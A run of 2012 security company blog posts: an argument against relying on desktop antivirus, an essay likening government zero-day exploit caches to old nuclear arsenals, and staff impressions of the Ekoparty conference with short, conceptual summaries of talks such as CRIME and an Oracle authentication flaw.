You’ll note that I typically differentiate between desktop and network antivirus. The reason for this is because I’m a firm advocate that the battle is already over if the malware makes it down to the host. If you’re going to do anything on the malware prevention side of things, then you need to do it before it gets to the desktop – ideally filtering the threat at the network level, but gateway prevention (e.g. at the mail gateway or proxy server) will be good enough for the bulk of non-targeted Internet threats. Antivirus operations at the desktop are best confined to cleanup, and even then I wouldn’t trust any of the products to be particularly good at that… all too often reimaging of the computer isn’t even enough in the face of malware threats such as TDL.

So, does an antivirus product still have what it takes to earn the real estate it take up on your computer? As a standalone security technology – No, I don’t believe so. If it’s free, never ever bothers me with popups, and I never need to know it’s there, then it’s not worth the effort uninstalling it and I guess it can stay… other than that, I’m inclined to look at other technologies that operate at the network layer or within the cloud; stop what you can before it gets to the desktop. Many of the bloated “improvements” to desktop antivirus products over recent years seem to be analogous to improving the hearing of a soldier so he can more clearly hear the ‘click’ of the mine he’s just stood on as it arms itself.

I’m all in favor of retraining any hunchbacked Igor we may come across. Perhaps he can make artwork out of discarded antivirus DVDs – just as kids did in the 1990’s with AOL CD’s?

— Gunter Ollmann, CTO — IOActive, Inc.
INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is” regardless of the questions particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices of what the exploits are retailing for. That’s because of my elusive answer above… I know of some researchers with their own private repository of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four-times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending for something that’ll most likely be sitting on the shelf that will expire in to uselessness before it could be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

 

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each laying on its side rusting and corroding away, having never been used, it finally hit me – governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly 6-figured wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.

INSIGHTS | October 2, 2012

Impressions from Ekoparty

Another ekoparty took place in Buenos Aires, Argentina, and for a whole week, Latin America had the chance to meet and get in touch with the best researchers in this side of the world.
A record-breaking number of 150 entries were received and analysed by the excellent academic committee formed by Cesar Cerrudo, Nico Waisman, Sebastian Muñiz, Gerardo Richarte, Juliano Rizzo.
There were more than 1500 people who enjoyed of 20 talks without any interruption, except when the Mariachis played.
Following last year’s ideas, when ekoparty became the last bastion of resistance to rebellion against machines, this resistance had to move out of the earth to fight the battle of knowledge sharing in another world.
IOActive again accompanied us with all their research team with an excellent stand that included a bartender and a bar throughout the event. IOActive went for more and also sponsored the VIP dinner to honor all exhibitors, organizers and sponsors, who accepted the challenge: Argentine asado vs. Tacos, prepared by their own research team. It was a head-to-head contest, but the advantage was that the meat was from Argentina 🙂

 

We would like to thank all the researchers, participants, sponsors that contribute to ekoparty’s growth! See you back next year to find out how this story goes on!

By Jennifer Steffens @securesun

For those who know me, I’m no stranger to the world of conferences and have attended both big and small cons around the world. I love experiencing the different communities and learning how different cultures impact the world of security as a whole. I recently had the pleasure of attending my second Ekoparty in Buenos Aires with IOActive’s Latin American team and it was again one of my all time favorites.

To put it simply, I am blown away by both the conference and the community. Francisco, Federico and crew do an amazing job from start to finish. The content is fresh and innovative. They offer all the great side acts that con attendees have grown to love – CTF, lock picking stations, giant robots with lasers, a computer museum as well as the beloved old school Mario Brothers game. Even the dreaded vendor area is vibrant and full of great conversations – as well as a bit of booze thanks to both our bar service and Immunity’s very tasty beer!

But the real heart of Ekoparty is the community. The respect and openness that everyone brings to the experience is refreshing and gives the conference a very “family-like” feel – even with 1500 people. I met so many interesting people and spent each day engaged in inspiring conversations about the industry, the culture and of course, how to be a vegetarian in Argentina (not easy AT ALL!).

A special thanks to Federico and Francisco for the invitation and generous VIP treatment throughout the week. It was a great opportunity for us to bring IOActive’s Latin American team together, which now includes 12 researchers from Argentina, Brazil, Colombia and Mexico; as well as meet potentially new “piratas” in the making. I am amazed every day at what that team is able to accomplish and am already looking forward to Ekoparty 2013 with an even bigger team of IOActive “piratas” joining us.

¡Gracias a los organizadores, speakers y asistentes de la Ekoparty 2012. La semana fue fantástica y espero verlos el año que viene!

 

By Cesar Cerrudo @cesarcer

 

This was my 5th time presenting in Ekoparty (I just missed one Ekoparty when my son was born 🙂), Ekoparty is one of my favorites conferences, I feel like a part of it, it’s on my own country which makes it special for me. It’s nice to get together with all the great Argentinean hackers, which by the way are very good and many, and with a lot of friends and colleagues from around the world. During all these years I have seen the growth in quality and quantity, I can say that this conference is currently at the same level that the big and most known ones and every year gets better.

 

This year I had the honor to give the aperture keynote “Cyberwar para todos”  where I presented my thoughts and views on the global Cyberwar scenario and encourage people to research the topic and get their own thoughts and conclusions.

 

We sponsored a VIP dinner where speakers, sponsors and friends enjoyed a great night with some long awaited Mexican tacos! Also we had a nice booth with free coffee service in the morning and open bar after noon, I don’t think it’s necessary to stress that it was a very, very popular booth 🙂

 

The talks were great and there was lot of research presented for the first time at Ekoparty, just take a look at recent news and you will see that this is not just “another“ conference. Last time I remember a security/hacking conference got so many related news was Black Hat/Defcon. We could say Ekoparty is becoming one of the most important world security/hacking conferences.

 

 By Stephan Chenette @StephanChenette

OK I’ll try my best to follow Cesar, this years keynote speaker, Francisco, one of the founders of EkoParty and Jennifer our CEO in giving an impression of the EkoParty conference. If you haven’t been to EkoParty, stop what you’re doing right now, check out the web site (http://ekoparty.org) and set yourself a reminder to buy a plane ticket and a entry ticket for next year – because this is a con worth attending. If nothing else you’ll learn or confirm what you had thought for years: that the Latin American hacker community is awesome and you should be paying attention to their research if you haven’t been already.

Three days long, EkoParty is compromised of a CTF, Lock picking area, training, and 20 interesting talks on research and security findings. The venue is something you’d expect from CCC or PH-Neutral: An Industrial, bare-bones building loaded up with ping pong tables and massive computing power with no shortness of smoke machines, lights and crazy gadgets on stage…oh and as you read above in Francisco’s summary, a Mariachi band (hey, it is Argentina!).

The building reminded me of the the elaborate Farady cage Gene Hackman had set up in the movie Enemy of the State that was used to hide from the CIA. Except Eko Party was filled with around 1500 attendees and organizers.

 

 

 

IOActive sponsored a a booth and tried their best to provide the attendees with as much quality alcohol as possible =] 
 

Our booth is where I spent most of my time when not seeing talks, so that I could hang out with IOActive’s Latin American team members originating from Mexico, Brazil, Colombia and Argentina.

I saw a number of talks while at EkoParty, but I’m sure most of you will agree the three most noteworthy talks were:
    • CRIME (Juliano Rizzo and Thai Doung)

 

    • Cryptographic Flaws in Oracle Database Authentication Protocol (Esteban Fayo)

 

    • Dirty use of USSD Codes in Cellular Network (Ravi Borgaonkar)

 

I won’t go into details on the above talks, as more information is now available online about them.
I was lucky enough to be accepted as as speaker this year and talk on research focused around defeating network and file-system detection. My past development experience is on detection of threats, but as I stated in my presentation: You must think offensively when creating defensive technology and make no mistake of overselling it’s limitations – a problem most salespeople at security companies have these days.
I spent about 75% of my time reviewing various content detection technologies from the last 20 years and explaining each one of their limitations. I then talked about the use of machine learning and natural language processing for both exploit and malware  detection as well as attribution. 
Machine learning like any technology used in defense, has it’s limitations and I tried to explain my point of view and importance of not only having a layered defense, but having a well thought  out layered defense that makes sense for your organization. 
As I stated in my presentation, attackers have several stages they typically go through to pull off a full attack and successfully ex-filtration data:

 

    • Recon (Intelligence gathering)

 

    • Penetration (exploitation of defenses)

 

    • Control (staging a persistent mechanism within the network)

 

    • Internal Recon

 

    • Ex-filtration of data

 

In my presentation I looked at the reality in offensive techniques against detection technologies: Attackers are going to stay just enough ahead of the defense curve to avoid detection.

 

(Stephan Chenette’s presentation on
“the Future of Automated Malware Generation”)
For example with Gauss and Zeus we’ve seen dlls being encrypted with a key only found on the targeted machine and downloaded binaries encrypted with information from the infected host – FYI – encrypting binaries with target information basically kills the possibility of any behavior sandbox from being able to run the binary outside of it’s intended environment.
So maybe attackers of the future will only make incremental improvements to thwart detection OR maybe we’ll start seeing anti-clustering and anti-classifications added to the attacker’s arsenal as machine learning is added as another layer of defense – The future is of course unknown – but I do have my suspicions.
In my concluding slides I stressed that there is much improvement that can be made on the side of detecting the threat before it happens as well as making sure that a defensive strategy should be layered in a manor that focuses on making the attacker spend, time, resources and different skill levels at each layer, hopefully comprising enough of his or herself in the process and giving the targeted organization enough time to mitigate the threat if not halt the attack all together.
This was by far the largest crowd I’ve ever spoken in front of and goes down as one of the best conferences I’ve attended. Thanks again EkoParty committee for inviting me to present, I’ll try my best to be back next year!!





By Ariel Sanchez

 

We had the opportunity at the Ekoparty to attend  presentations which a show high level of innovation and creativity.

 

Here are some personal highlights:

 

 *The CRIME Attack presentation by Juliano Rizzo and Thai Doung

 

 *Trace Surfing presentation by Agustin Gianni

 

 *Cryptographic flaws in Oracle Database authentication protocol presentation by Esteban Fayo

 

I can’t wait to see what is coming in the next ekoparty!

 

 

By Tiago Assumpcao @coconuthaxor

 

If my memory is accurate, this was my fourth EkoParty. From the first time to now, the numbers related to the conference have grown beyond my imagination. On the other hand, EkoParty remains the same on another aspect: it has the energetic blood of Latin American hackers. Too many of them, actually. Buenos Aires has a magical history of popping up talents like nowhere else. And the impressive numbers and quality of EkoParty, today, definitely have to do with that magic.

 

There were many great talks, on a wide range of topics. I will summarize the ones I mostly appreciated, being forced to leave aside the ones I didn’t have the chance to catch.

 

Cyberwar para todos, I’ve seen people complaining about this topic, either because it’s political (rather than technical), or because “it’s been too stressed” already. In my opinion, one can’t ignore how the big empires think of information security. Specifically, here is what I liked about this talk: the topic might have been stressed in North America, but the notion of cyberwar, per Gen. Keith Alexander’s vision, is still unknown to most in South America. A few years ago, the Brazilian CDCiber (Cyber Defense Centre) was created and, despite effort coming directly from the President, the local authorities are still very naïve, to say least, if compared to their rich cousins. Cesar raises questions about that.

 

Satellite baseband mods: Taking control of the InmarSat GMR-2 phone terminal, this was probably my favorite talk. They showed how a user can easily modify satellite phones at will, poking data that comes in and out of the device. Furthermore, the presenters showed how communication technologies very similar to GSM, when applied over a different medium, can open whole new vectors of potential attacks. Finally, Sebastian “Topo” Muniz is one of the most hilarious speakers in the infosec industry.

 

Trace Surfing, this is one of those rare talks that resolve hard problems with very simple solutions. Agustín showed how one can retrieve high-level information about the Windows heap, during the course of an execution trace, simply by tracking ABI specifics at call-sites of choice. The simplicity of his solution also makes it really fast. Great work!

 

PIN para todos (y todas), basically Pablo Sole created an interface that allows one to write Pin-based tools to instrument JavaScript. I heard it’s impressively fast.

 

What I really wanted to have seen, but couldn’t…

 

OPSEC: Because Jail is for wuftpd, unfortunately, they had Grugq speaking at 9am. I can’t digest humour so early and will have to ask him for a secondhand presentation.

 

Literacy for Integrated Circuit Reverse Engineering, very sadly, I didn’t catch Alex’s presentation. But if you are into reverse engineering modern devices, I would recommend it with both my eyes closed, nonetheless.

 

 

By Lucas Apa @lucasapa

What begun publicly as an e-zine in the early century now arises as the most important latin american security conference “ekoparty”. All the latin american team landed Buenos Aires to spend an amazing week.
My “ekoparty week” started on monday where I got invited to attend a “Malware Analysis Training” by ESET after solving a challenge of “binary unpacking” posted on their blog. First, two intensive days were held with paid trainings which covered the following topics: cracking, exploiting, sap security, penetration testing,  web security, digital forensics and threats defense. Every classroom was almost fully booked.

The conference started on Wednesday in “Konex Cultural Center”, one of the most famous cultural centers especially for music and events. The building used to be an oil factory some decades ago.
On Wednesday, our CTO Cesar Cerrudo, was the main keynote of the day.
Many workshops were open for any conference assistant for the rest of the day.

At night we enjoyed a classic “Mexican Grill” at IOActive’s party where VIP guests were invited. The meal was brought you by Alejandro Hernández and Diego Madero, our Mexican Security Consultants.
On Thursday and Friday were the most awaited days since the presentations were going to start.

My favorite talks were:

*Taking control of the InmarSat GMR-2 phone terminal (Sebastian Muñiz and Alfredo Ortega): Without modifying the firmware image, researchers managed to send AT commands to the phone terminal to write arbitrary memory. They copied binary instrumentation code for logging and hooking what really sends the phone on common actions like sending SMS. Then, they wrote the “data” section for redirecting the flow at some point and discovered that messages sent to the satellite “might” be vulnerable to
“memory corruption” if they are preprocessed by the satellite before retransmision. No satellites were harmed.

*VGA Persistent Rootkit (Nicolás Economou and Diego Juarez): Showed a new combo of techniques for modifing reliably the firmware of a VGA card to execute code or add new malicious basic blocks.

*The Crime (Juliano Rizzo and Thai Duong): The most awaited talk revealed a new chosen plaintext attack where compression allowed to recognize which secuences of bytes were already on the TLS data. The attack works like BEAST, with two requirements: capture encrypted victim’s traffic and control his browser by using a web vulnerability (or MITM on an HTTP service). When forcing the browser to issuing some specific words on the HTTP resource location, they figured that if that portion of the random string is already on the cookie the TLS data gets more compressed. This allows to bruteforce to identify the  piggybacked cookie that is automatically added to the request.

*The Future of Automated Malware Generation (Stephan Chenette): Our Director of R&D showed how different AV’s performs approaches for detecting malware mostly failing. It is difficult to defend ourselves in something we dont know but we must remember that attackers are also having fun with Machine Learning too !

*Cryptographic flaws in Oracle DB auth protocol (Esteban Fayó): When authenticating a user, Oracle uses the hashed password (on the database) as the key for encrypting the server session (random). The user hashes its password and then tries to decrypt the encrypted session that the server returned. The problem is that is possible to recognize if this decryption returns an invalid padding so the initial password can be tried offline. This allows to bruteforce the process of decrypting locally till a valid padding occurs (sometimes it colides with a valid padding but it’s not actually the password). This vulnerability was
reported to Oracle 2 years ago but no patch was provided by them till then.

 

By Alejandro Hernández @nitr0usmx

 

After a 10 hours delayed flight, finally I landed to Buenos Aires. As soon as I could, I went straight to the VIP party to meet with the IOActive team and to prepare some mexican tacos and quesadillas (made by Diego Bauche @dexosexo).

 

The next day, Thursday, I had the chance to be at the Stephan Chanette’s talk (@StephanChenette), which was a really interesting presentation about automated malware generation and future expectations. His presentation had a good structure because he started with the current state of malware generation/defense and later he explained the future of malware generation/defense passing through the actual malware trends. The same day, I enjoyed the Esteban Fayo’s talk (@estemf) because he showed a live demo on how to crack an Oracle password taking advantage of some flaws in the Oracle authentication protocol.

 

The venue, KONEX, the same as the last year, was really cool, there were vendors booths, old computers, video games (where I spent like two hours playing Super Mario Bros) as well as a cocktail bar, obviously the IOActive booth ;).

 

In conclusion, I really had a great time with my fellow workers, drinking red wine and argentine asado, besides amazing conferences.

 

Definitely, I hope to be there the next year.